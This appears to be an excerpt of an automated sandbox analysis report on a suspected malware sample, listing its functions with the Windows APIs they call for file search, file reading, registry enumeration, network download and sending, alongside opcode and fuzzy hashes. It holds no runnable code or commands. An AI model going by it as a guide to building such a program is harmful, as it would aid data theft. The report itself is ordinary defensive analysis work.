                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CopyFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1304948518-0
                                                                                                                                                                                                                                                                                            • Opcode ID: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
                                                                                                                                                                                                                                                                                            • Instruction ID: 1daf45191db6c52babe1fe8c8a27866bb4fb13e0f71ca1e9aaeaddf3e781aff4
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d14a2ba5cc82fcc1864902cf64a2bea3494f77a9fcd36c36f244b44799870a20
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 63E06DBAB412008BC71CFF68ECA4F6A33A5EB96740B08402CA802C33D4DD609911CA4A
                                                                                                                                                                                                                                                                                            Function 0040A36D Relevance: 1.5, APIs: 1, Instructions: 24networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • send.WS2_32(?,00000000,00000000,00000000), ref: 0040A398
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: send
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2809346765-0
                                                                                                                                                                                                                                                                                            • Opcode ID: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
                                                                                                                                                                                                                                                                                            • Instruction ID: f7f0187726c946ab94bd7783febf1ef7e1263ef785280c0f7cc2a8f968373833
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: c86cb437a16923ba70a9f6b55ded9f8956fbf0d8b58b57c2774321bcb1cc0512
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 6AE09275380200DFD750EB6CCC80B2933E5AB88358F040524F225D73E2C638AE518B5A
                                                                                                                                                                                                                                                                                            Function 004095F3 Relevance: 1.5, APIs: 1, Instructions: 24filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
                                                                                                                                                                                                                                                                                            • Instruction ID: 793b8917542ee9cb27708f1ec57fc827c82194574f1446412d7664dbd63c4935
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 8ddbed3e19b3c5e16b329f61f458e941262536b44169388930885874bfec931b
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 14E0657A348201EFD340CB5DDC84F6AB3E89B88644F180428A00AC3392CA74EC00DB2A
                                                                                                                                                                                                                                                                                            Function 0041FE65 Relevance: 1.5, APIs: 1, Instructions: 24registryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: Enum
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2928410991-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
                                                                                                                                                                                                                                                                                            • Instruction ID: 05a1160b0d36b77b328343130d452bea134fcae93cfb3c47e4085434c63e978c
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7e85817e22f138c02c453e3c8736ecf73058679fe76b3fc0f0587abf6011d14e
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 51F08270A183459FDB08DF29C894569B7E1BFC8314F14C92EE89A47354F770A885CB86
                                                                                                                                                                                                                                                                                            Function 00413263 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • FindNextFileA.KERNELBASE(?,?), ref: 00413298
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileFindNext
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2029273394-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
                                                                                                                                                                                                                                                                                            • Instruction ID: c6d18ff3661babe7afd2bf8597fec0b91fd64dfa3a206f198322a9390ae50d2e
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 15c4ffbb12baafcaac6dc899ca935e25643eb30cf0bd71265adac321ad7158ee
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2DF01CB6B4010A8BCB05CB58DD91BDC33B5EF58204F140128D909D7261EA31BE158F54
                                                                                                                                                                                                                                                                                            Function 0042C391 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32 ref: 0042C39D
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
                                                                                                                                                                                                                                                                                            • Instruction ID: 6d828852da939186bf56a3799f9f6520df9f02f76987a01fc32ecadda15bd6d6
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 011e9bd8fc71e4e42e049cef734956ce052094584bd460ef50def60e2692713a
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: FAE09276B801049BE315C789EC90F7973A6AFC9300F6940399616C73D2CE74AC05876C
                                                                                                                                                                                                                                                                                            Function 00409580 Relevance: 1.5, APIs: 1, Instructions: 23filenetworkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • InternetReadFile.WININET(?,?,00000FFF,?), ref: 004095AA
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileInternetRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 778332206-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
                                                                                                                                                                                                                                                                                            • Instruction ID: 282d77582df1dc03db1effc52c008eafb25d4b73df9bbd85ee4dda3fdaa0c12f
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 0b13a4c9756e6dbc5a3b479240f144414e6dfb9d172209e6f6427846867f8471
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 41E0DF7A344001EFC384CB5CDC85EAA33E9AF842047180579B80AC73A2EB70ED19CB08
                                                                                                                                                                                                                                                                                            Function 0040C924 Relevance: 1.5, APIs: 1, Instructions: 23COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • PathFileExistsA.SHLWAPI(00000000), ref: 0040C94F
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ExistsFilePath
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1174141254-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
                                                                                                                                                                                                                                                                                            • Instruction ID: a0ac7273f53d20d96c15c6bff5cc153122d5beba8fb7721ef6fb638b5fbe53e8
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 20f0f2f987cdd6fd5d78be4d92f2ad059cd5cf2e3368b0de4e59f1860672bcd1
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 40E09276B002058FC788FB9CDCE4F6933E4EB46204B04003C9906D3351DA289D16CB48
                                                                                                                                                                                                                                                                                            Function 00407751 Relevance: 1.5, APIs: 1, Instructions: 22networkCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: ConnectInternet
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3050416762-0
                                                                                                                                                                                                                                                                                            • Opcode ID: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
                                                                                                                                                                                                                                                                                            • Instruction ID: 1446014fd0c9d4017d764f9b938a641aa2b32dcb309b268e3664a91dcaf54a16
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: b95de7b108c177cff31b336e0a3386d780ae9b85be1aeec919afe5d5e6169278
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 62F0A034E093418BC314CF69D54062AB7F2BFD9305F15C62DE85887364EA309C91CF41
                                                                                                                                                                                                                                                                                            Function 00422B74 Relevance: 1.5, APIs: 1, Instructions: 22COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • K32GetModuleFileNameExA.KERNEL32(?,00000000,?,00000104), ref: 00422B84
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileModuleName
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 514040917-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
                                                                                                                                                                                                                                                                                            • Instruction ID: 69e6cde24125f6890367141ee933c78470dc6f28d39b691ac87247349ccaad8d
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 52b15660bd697938981da5ee73889311184e970823131d8a2279e521e5bee4fd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: ABD05E763801082BE600F74FFCC1FBA33A8FB83ABCF080035F288C3280C559A8994169
                                                                                                                                                                                                                                                                                            Function 00421B88 Relevance: 1.5, APIs: 1, Instructions: 22memoryCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,00000008), ref: 00421BA2
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 793ce0ae4f8bb3d1bb642a415763f876b6cd25f1444373563aa98e422428ced6
                                                                                                                                                                                                                                                                                            • Instruction ID: 026f7c298e305e7d7ce455381b0712138cb142cdf70c581b58335424dd276684
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 793ce0ae4f8bb3d1bb642a415763f876b6cd25f1444373563aa98e422428ced6
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C2E0DF756002028BC304CF69DC90E1A33E4FF85310B05007DA801D3361CB34EC45CB88
                                                                                                                                                                                                                                                                                            Function 0040C975 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
                                                                                                                                                                                                                                                                                            • Instruction ID: 79fb95547d5fdbe54a16516f1546399437a45ab7f8c97ea9a6881ddec385e781
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 3fb8d76a0d4f9672b6b9978df7dcd38b4171413283df2e9b1cfd581a8d4a8782
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 46F03971944241CBE740EF6CEC8476977F0FB94314F14462CE894D72A1DB7499998B4A
                                                                                                                                                                                                                                                                                            Function 0040CAD1 Relevance: 1.5, APIs: 1, Instructions: 20fileCOMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,?,?,00000000), ref: 0040CAEC
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: FileRead
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 2738559852-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
                                                                                                                                                                                                                                                                                            • Instruction ID: 8f33944eb265aadd8b99b5613bb51d2a6a1012877fb87abd0653211fac53b3bf
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1fe233bd45b73fb4e76dadc43ffb76967d15a1422c2845191ef2c301cb6acfbd
                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: CFE04870B412069FC704EFA5CD84F96B7B6FF84644F548568D401D7159EA719806C794
                                                                                                                                                                                                                                                                                            Function 00421992 Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                                                                                                                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                            • GetFileAttributesA.KERNEL32(00000000), ref: 004219B0
                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.2561263468.0000000000401000.00000080.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561216462.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561343678.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561399320.0000000000447000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561440787.0000000000452000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.2561462024.0000000000456000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_400000_BHgwhz3lGN.jbxd
                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                            • Opcode ID: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
                                                                                                                                                                                                                                                                                            • Instruction ID: 1cc98b9c078abeda64e2b049747d0090427da3c271b2c9e07a9196400bb093bd
                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6ad2aecadb6b92fef9065b430b3f00a23771f5bd5df6e859b6afbc5f368a2d2c
